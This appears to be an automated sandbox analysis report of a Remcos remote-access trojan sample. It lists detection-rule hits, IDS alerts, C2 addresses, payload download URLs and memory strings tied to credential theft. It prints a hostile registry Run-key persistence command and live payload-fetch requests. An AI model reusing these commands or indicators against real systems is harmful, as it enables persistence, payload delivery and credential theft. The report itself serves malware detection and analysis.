Source: Network Connection. Author: frack113. Data: DestinationIp: 172.67.155.139, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\SysWOW64\msiexec.exe, Initiated: true, ProcessId: 7104, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49737
Source: Process started. Author: Florian Roth (Nextron Systems). Data: Command: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Gummicheckene" /t REG_EXPAND_SZ /d "%Assumably% -windowstyle 1 $Dilatationens=(gp -Path 'HKCU:\Software\Darksomeness\').Subtropiske;%Assumably% ($Dilatationens)", CommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Gummicheckene" /t REG_EXPAND_SZ /d "%Assumably% -windowstyle 1 $Dilatationens=(gp -Path 'HKCU:\Software\Darksomeness\').Subtropiske;%Assumably% ($Dilatationens)", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Windows\SysWOW64\msiexec.exe", ParentImage: C:\Windows\SysWOW64\msiexec.exe, ParentProcessId: 7104, ParentProcessName: msiexec.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Gummicheckene" /t REG_EXPAND_SZ /d "%Assumably% -windowstyle 1 $Dilatationens=(gp -Path 'HKCU:\Software\Darksomeness\').Subtropiske;%Assumably% ($Dilatationens)", ProcessId: 7084, ProcessName: cmd.exe
Source: Process started. Author: Michael Haag. Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\biljl.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\biljl.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Windows\SysWOW64\msiexec.exe", ParentImage: C:\Windows\SysWOW64\msiexec.exe, ParentProcessId: 7104, ParentProcessName: msiexec.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\biljl.vbs" , ProcessId: 4324, ProcessName: wscript.exe
Source: Process started. Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements). Data: Command: powershell.exe -windowstyle hidden (obfuscated command line, cut off in the report; the full command line is listed under PID 6852 in the process tree above)

Stealing of Sensitive Information

Source: File created. Author: Joe Security. Data: EventID: 11, Image: C:\Windows\SysWOW64\msiexec.exe, ProcessId: 7104, TargetFilename: C:\ProgramData\remcos\logs.dat

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-10-21T08:34:49.174652+0200 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49738 | 185.236.203.101 | 51525 | TCP
2024-10-21T08:34:51.151958+0200 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49739 | 185.236.203.101 | 51525 | TCP
2024-10-21T08:34:56.948809+0200 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49741 | 185.236.203.101 | 51525 | TCP
2024-10-21T08:34:56.968527+0200 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49742 | 185.236.203.101 | 51525 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-10-21T08:34:51.998973+0200 | 2803304 | 3 | Unknown Traffic | 192.168.2.4 | 49740 | 178.237.33.50 | 80 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-10-21T08:34:38.838096+0200 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49737 | 172.67.155.139 | 443 | TCP

                AV Detection

                Source: rIMG465244247443GULFORDEROpmagasinering.cmdVirustotal: Detection: 23%Perma Link
                Source: rIMG465244247443GULFORDEROpmagasinering.cmdReversingLabs: Detection: 18%
                Source: Yara matchFile source: 00000009.00000003.2203587512.00000000092F7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 7104, type: MEMORYSTR
                Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
                Source: Submitted SampleIntegrated Neural Analysis Model: Matched 99.9% probability
                Source: unknownHTTPS traffic detected: 172.67.155.139:443 -> 192.168.2.4:49730 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.155.139:443 -> 192.168.2.4:49737 version: TLS 1.2
                Source: Binary string: ore.pdb source: powershell.exe, 00000004.00000002.2000694205.0000000008910000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\*.** source: msiexec.exe, 0000000E.00000002.2241394427.0000000002857000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: AppData\Local\Temp\Symbols\ntkrnlmp.pdb\*.*3 source: msiexec.exe, 0000000E.00000002.2241394427.000000000283A000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: xqm.Core.pdbol source: powershell.exe, 00000004.00000002.2000694205.0000000008910000.00000004.00000020.00020000.00000000.sdmp
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_0040AE51 FindFirstFileW,FindNextFileW,13_2_0040AE51
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,14_2_00407EF8
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,15_2_00407898

                Networking

                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49739 -> 185.236.203.101:51525
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49738 -> 185.236.203.101:51525
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49742 -> 185.236.203.101:51525
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49741 -> 185.236.203.101:51525
                Source: unknownDNS query: name: pelele.duckdns.org
                Source: global trafficTCP traffic: 192.168.2.4:49738 -> 185.236.203.101:51525
                Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
                Source: Joe Sandbox ViewIP Address: 185.236.203.101 185.236.203.101
                Source: Joe Sandbox ViewIP Address: 178.237.33.50 178.237.33.50
                Source: Joe Sandbox ViewASN Name: M247GB M247GB
                Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                Source: Network trafficSuricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.4:49740 -> 178.237.33.50:80
                Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49737 -> 172.67.155.139:443
                Source: global trafficHTTP traffic detected: GET /Underbyggelse.aaf HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: plieltd.topConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /FevmSBTRsrPt160.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: plieltd.topCache-Control: no-cache
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficHTTP traffic detected: GET /Underbyggelse.aaf HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: plieltd.topConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /FevmSBTRsrPt160.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: plieltd.topCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
                Source: msiexec.exe, 0000000F.00000002.2225859167.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Users%s\Loginprpl-msnprpl-yahooprpl-jabberprpl-novellprpl-oscarprpl-ggprpl-ircaccounts.xmlaimaim_1icqicq_1jabberjabber_1msnmsn_1yahoogggg_1http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com equals www.ebuddy.com (eBuggy)
                Source: msiexec.exe, msiexec.exe, 0000000F.00000002.2225859167.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com equals www.ebuddy.com (eBuggy)
                Source: msiexec.exeString found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
                Source: msiexec.exe, 0000000D.00000003.2244485781.0000000004991000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000D.00000003.2249304549.000000000499B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000D.00000003.2249145713.000000000499B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srffile:///C:/Windows/system32/oobe/FirstLogonAnim.htmlfile://192.168.2.1/all/install/setup.au3file://192.168.2.1/all/ProfessionalRetail.imgfile://192.168.2.1/all/Professional2019Retail.imghttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.facebook.com (Facebook)
                Source: msiexec.exe, 0000000D.00000003.2244485781.0000000004991000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000D.00000003.2249304549.000000000499B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000D.00000003.2249145713.000000000499B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srffile:///C:/Windows/system32/oobe/FirstLogonAnim.htmlfile://192.168.2.1/all/install/setup.au3file://192.168.2.1/all/ProfessionalRetail.imgfile://192.168.2.1/all/Professional2019Retail.imghttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.yahoo.com (Yahoo)
                Source: bhvF678.tmp.13.drString found in binary or memory: pop-lva1.www.linkedin.com equals www.linkedin.com (Linkedin)
                Source: bhvF678.tmp.13.drString found in binary or memory: pop-lva1.www.linkedin.com0 equals www.linkedin.com (Linkedin)
                Source: msiexec.exe, 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.facebook.com (Facebook)
                Source: msiexec.exe, 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.yahoo.com (Yahoo)
                Source: global trafficDNS traffic detected: DNS query: plieltd.top
                Source: global trafficDNS traffic detected: DNS query: pelele.duckdns.org
                Source: global trafficDNS traffic detected: DNS query: geoplugin.net
                Source: bhvF678.tmp.13.drString found in binary or memory: http://cacerts.digicert.com/DigiCertCloudServicesCA-1.crt0
                Source: bhvF678.tmp.13.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
                Source: bhvF678.tmp.13.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
                Source: bhvF678.tmp.13.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
                Source: bhvF678.tmp.13.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0B
                Source: bhvF678.tmp.13.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG3.crt0
                Source: bhvF678.tmp.13.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2SecureServerCA-2.crt0
                Source: bhvF678.tmp.13.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTLSRSASHA2562020CA1-1.crt0
                Source: bhvF678.tmp.13.drString found in binary or memory: http://cacerts.digicert.com/GeoTrustGlobalTLSRSA4096SHA2562022CA1.crt0
                Source: powershell.exe, 00000004.00000002.1996067162.0000000007B57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microB
                Source: bhvF678.tmp.13.drString found in binary or memory: http://crl3.digicert.com/DigiCertCloudServicesCA-1-g1.crl0?
                Source: bhvF678.tmp.13.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
                Source: bhvF678.tmp.13.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
                Source: bhvF678.tmp.13.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl0
                Source: bhvF678.tmp.13.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
                Source: bhvF678.tmp.13.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG3.crl07
                Source: bhvF678.tmp.13.drString found in binary or memory: http://crl3.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
                Source: bhvF678.tmp.13.drString found in binary or memory: http://crl3.digicert.com/DigicertSHA2SecureServerCA-1.crl0?
                Source: bhvF678.tmp.13.drString found in binary or memory: http://crl3.digicert.com/GeoTrustGlobalTLSRSA4096SHA2562022CA1.crl0H
                Source: bhvF678.tmp.13.drString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
                Source: bhvF678.tmp.13.drString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0=
                Source: bhvF678.tmp.13.drString found in binary or memory: http://crl4.digicert.com/DigiCertCloudServicesCA-1-g1.crl0
                Source: bhvF678.tmp.13.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
                Source: bhvF678.tmp.13.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
                Source: bhvF678.tmp.13.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG3.crl0
                Source: bhvF678.tmp.13.drString found in binary or memory: http://crl4.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
                Source: bhvF678.tmp.13.drString found in binary or memory: http://crl4.digicert.com/DigicertSHA2SecureServerCA-1.crl0
                Source: bhvF678.tmp.13.drString found in binary or memory: http://crl4.digicert.com/DigicertSHA2SecureServerCA-1.crl0~
                Source: bhvF678.tmp.13.drString found in binary or memory: http://crl4.digicert.com/GeoTrustGlobalTLSRSA4096SHA2562022CA1.crl0
                Source: msiexec.exe, 00000009.00000003.2203587512.00000000092F7000.00000004.00000020.00020000.00000000.sdmp, bhvF678.tmp.13.drString found in binary or memory: http://geoplugin.net/json.gp
                Source: msiexec.exe, 00000009.00000003.2203587512.00000000092F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpH
                Source: msiexec.exe, 00000009.00000003.2203587512.00000000092F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpT
                Source: msiexec.exe, 00000009.00000003.2203587512.00000000092F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpk
                Source: msiexec.exe, 00000009.00000003.2203587512.00000000092F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpl
                Source: msiexec.exe, 00000009.00000003.2203587512.00000000092F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpt
                Source: msiexec.exe, 00000009.00000003.2203587512.00000000092F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpz
                Source: powershell.exe, 00000002.00000002.1808977051.000001209006F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1983290797.0000000005F27000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                Source: bhvF678.tmp.13.drString found in binary or memory: http://ocsp.digicert.com0
                Source: bhvF678.tmp.13.drString found in binary or memory: http://ocsp.digicert.com0:
                Source: bhvF678.tmp.13.drString found in binary or memory: http://ocsp.digicert.com0H
                Source: bhvF678.tmp.13.drString found in binary or memory: http://ocsp.digicert.com0I
                Source: bhvF678.tmp.13.drString found in binary or memory: http://ocsp.digicert.com0Q
                Source: bhvF678.tmp.13.drString found in binary or memory: http://ocsp.msocsp.com0
                Source: bhvF678.tmp.13.drString found in binary or memory: http://ocsp.msocsp.com0S
                Source: bhvF678.tmp.13.drString found in binary or memory: http://ocspx.digicert.com0E
                Source: powershell.exe, 00000004.00000002.1967209792.0000000005018000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1996067162.0000000007B20000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                Source: powershell.exe, 00000002.00000002.1787742509.0000012081D81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://plieltd.top
                Source: powershell.exe, 00000002.00000002.1787742509.0000012080001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1967209792.0000000004EC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: powershell.exe, 00000004.00000002.1967209792.0000000005018000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1996067162.0000000007B20000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                Source: bhvF678.tmp.13.drString found in binary or memory: http://www.digicert.com/CPS0
                Source: bhvF678.tmp.13.drString found in binary or memory: http://www.digicert.com/CPS0~
                Source: msiexec.exe, msiexec.exe, 0000000F.00000002.2225859167.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com
                Source: msiexec.exe, msiexec.exe, 0000000F.00000002.2225859167.0000000000400000.00000040.80000000.00040000.00000000.sdmp, msiexec.exe, 0000000F.00000003.2225662972.0000000002D2D000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000F.00000003.2225640683.0000000002D2D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.imvu.com
                Source: msiexec.exe, 0000000F.00000002.2225859167.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
                Source: msiexec.exe, 0000000F.00000002.2225859167.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comr
                Source: msiexec.exe, 0000000F.00000003.2225662972.0000000002D2D000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000F.00000003.2225640683.0000000002D2D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.imvu.comta
                Source: msiexec.exe, 00000009.00000003.2092467601.0000000009300000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000003.2203587512.00000000092F7000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000003.2092557647.0000000009300000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.cw
                Source: bhvF678.tmp.13.drString found in binary or memory: http://www.msftconnecttest.com/connecttest.txt?n=1696334965379
                Source: msiexec.exe, 0000000D.00000002.2249718163.0000000002B24000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net
                Source: msiexec.exe, 0000000F.00000002.2225859167.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net/
                Source: bhvF678.tmp.13.drString found in binary or memory: https://18a72a1f5c7b170c6cc0a459d463264e.azr.footprintdns.com/apc/trans.gif?18b635b804a8d6ad0a1fa437
                Source: bhvF678.tmp.13.drString found in binary or memory: https://18a72a1f5c7b170c6cc0a459d463264e.azr.footprintdns.com/apc/trans.gif?c9b5e9d2b836931c8ddd4e8d
                Source: bhvF678.tmp.13.drString found in binary or memory: https://4c4f378c706610974da9cb9d99fe3116.azr.footprintdns.com/apc/trans.gif?1c89d9658c6af83a02d98b03
                Source: bhvF678.tmp.13.drString found in binary or memory: https://4c4f378c706610974da9cb9d99fe3116.azr.footprintdns.com/apc/trans.gif?74b620657ac570f7999e6ad7
                Source: bhvF678.tmp.13.drString found in binary or memory: https://58293426822f9aaf9d7c729f28294583.azr.footprintdns.com/apc/trans.gif?cf2d8bf3b68a3e37eef992d5
                Source: bhvF678.tmp.13.drString found in binary or memory: https://58293426822f9aaf9d7c729f28294583.azr.footprintdns.com/apc/trans.gif?fc66b8a78ab7a1394f56e742
                Source: bhvF678.tmp.13.drString found in binary or memory: https://86dd05e6f545b5502aade4a1946d3e9d.azr.footprintdns.com/apc/trans.gif?66601c3b572f284b9da07fcc
                Source: bhvF678.tmp.13.drString found in binary or memory: https://86dd05e6f545b5502aade4a1946d3e9d.azr.footprintdns.com/apc/trans.gif?f67d919da1a9ba8a5672367d
                Source: bhvF678.tmp.13.drString found in binary or memory: https://M365CDN.nel.measure.office.net/api/report?FrontEnd=VerizonCDNWorldWide&DestinationEndpoint=W
                Source: bhvF678.tmp.13.drString found in binary or memory: https://acae307a6acdd4e64531be6276770618.azr.footprintdns.com/apc/trans.gif?467894188c5d788807342326
                Source: bhvF678.tmp.13.drString found in binary or memory: https://acae307a6acdd4e64531be6276770618.azr.footprintdns.com/apc/trans.gif?a176b93f037f93b5720edf68
                Source: bhvF678.tmp.13.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingaot
                Source: bhvF678.tmp.13.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingaotak
                Source: bhvF678.tmp.13.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingrms
                Source: bhvF678.tmp.13.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingth
                Source: bhvF678.tmp.13.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=wsb
                Source: powershell.exe, 00000002.00000002.1787742509.0000012080001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                Source: powershell.exe, 00000004.00000002.1967209792.0000000004EC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lBtq
                Source: bhvF678.tmp.13.drString found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
                Source: bhvF678.tmp.13.drString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svg
                Source: bhvF678.tmp.13.drString found in binary or memory: https://config.edge.skype.com/config/v1/ODSP_Sync_Client/19.043.0304.0013?UpdateRing=Prod&OS=Win&OSV
                Source: bhvF678.tmp.13.drString found in binary or memory: https://config.edge.skype.com/config/v1/Skype/1446_8.53.0.77?OSVer=10.0.19045.2006&ClientID=RHTiQUpX
                Source: powershell.exe, 00000004.00000002.1983290797.0000000005F27000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                Source: powershell.exe, 00000004.00000002.1983290797.0000000005F27000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                Source: powershell.exe, 00000004.00000002.1983290797.0000000005F27000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                Source: bhvF678.tmp.13.drString found in binary or memory: https://cxcs.microsoft.net/api/settings/en-GB/xml/settings-tipset?release=20h1&sku=Professional&plat
                Source: bhvF678.tmp.13.drString found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
                Source: bhvF678.tmp.13.drString found in binary or memory: https://ecs.nel.measure.office.net?TenantId=ODSP_Sync_Client&DestinationEndpoint=Edge-Prod-BL2r8e&Fr
                Source: bhvF678.tmp.13.drString found in binary or memory: https://ecs.nel.measure.office.net?TenantId=ODSP_Sync_Client&DestinationEndpoint=Edge-Prod-BLUr5a&Fr
                Source: bhvF678.tmp.13.drString found in binary or memory: https://ecs.nel.measure.office.net?TenantId=Skype&DestinationEndpoint=Edge-Prod-BL2r8e&FrontEnd=AFD
                Source: bhvF678.tmp.13.drString found in binary or memory: https://fp-afd-nocache-ccp.azureedge.net/apc/trans.gif?99bdaa7641aea1439604d0afe8971477
                Source: bhvF678.tmp.13.drString found in binary or memory: https://fp-afd-nocache-ccp.azureedge.net/apc/trans.gif?bc7d158a1b0c0bcddb88a222b6122bda
                Source: bhvF678.tmp.13.drString found in binary or memory: https://fp-afdx-bpdee4gtg6frejfd.z01.azurefd.net/apc/trans.gif?60caefc8ca640843bccad421cfaadcc8
                Source: bhvF678.tmp.13.drString found in binary or memory: https://fp-afdx-bpdee4gtg6frejfd.z01.azurefd.net/apc/trans.gif?a9bddedb22fa9ee1d455a5d5a89b950c
                Source: bhvF678.tmp.13.drString found in binary or memory: https://fp-vp-nocache.azureedge.net/apc/trans.gif?4be9f57fdbd89d63c136fa90032d1d91
                Source: bhvF678.tmp.13.drString found in binary or memory: https://fp-vp-nocache.azureedge.net/apc/trans.gif?e5772e13592c9d33c9159aed24f891a7
                Source: bhvF678.tmp.13.drString found in binary or memory: https://fp-vp.azureedge.net/apc/trans.gif?a6aceac28fb5ae421a73cab7cdd76bd8
                Source: bhvF678.tmp.13.drString found in binary or memory: https://fp-vp.azureedge.net/apc/trans.gif?b57fe5cd49060a950d25a1d237496815
                Source: bhvF678.tmp.13.drString found in binary or memory: https://fp-vs-nocache.azureedge.net/apc/trans.gif?2f6c563d6db8702d4f61cfc28e14d6ba
                Source: bhvF678.tmp.13.drString found in binary or memory: https://fp-vs-nocache.azureedge.net/apc/trans.gif?3dacce210479f0b4d47ed33c21160712
                Source: bhvF678.tmp.13.drString found in binary or memory: https://fp-vs-nocache.azureedge.net/apc/trans.gif?7e0e9c3a9f02f17275e789accf11532b
                Source: bhvF678.tmp.13.drString found in binary or memory: https://fp-vs-nocache.azureedge.net/apc/trans.gif?81f59f7d566abbd2077a5b6cdfd04c7b
                Source: bhvF678.tmp.13.drString found in binary or memory: https://fp-vs.azureedge.net/apc/trans.gif?3c5bdbf226e2549812723f51b8fe2023
                Source: bhvF678.tmp.13.drString found in binary or memory: https://fp-vs.azureedge.net/apc/trans.gif?c50299ad5b45bb3d4c7a57024998a291
                Source: bhvF678.tmp.13.drString found in binary or memory: https://fp.msedge.net/conf/v2/asgw/fpconfig.min.json?monitorId=asgw
                Source: powershell.exe, 00000004.00000002.1967209792.0000000005018000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1996067162.0000000007B20000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                Source: powershell.exe, 00000002.00000002.1787742509.0000012080BBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
                Source: bhvF678.tmp.13.drString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
